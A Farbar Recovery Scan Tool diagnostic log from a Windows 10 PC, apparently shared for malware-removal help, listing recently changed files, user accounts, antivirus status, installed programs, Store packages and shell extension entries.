2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 07:09 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-20 07:08 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 07:08 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-19 21:49 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-19 19:22 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-19 14:44 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-19 14:44 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-18 17:25 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 19:23 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-15 07:42 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 07:16 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-14 07:16 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-14 07:16 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-14 07:11 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-14 07:11 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-14 07:11 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-14 07:11 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:19 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-09 08:05 - 2017-03-10 18:17 - 000044003 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp

==================== Files in the root of some directories ========

2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Part 2

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-01-2021
Ran by IRENA-PC (20-01-2021 07:17:24)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden

Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
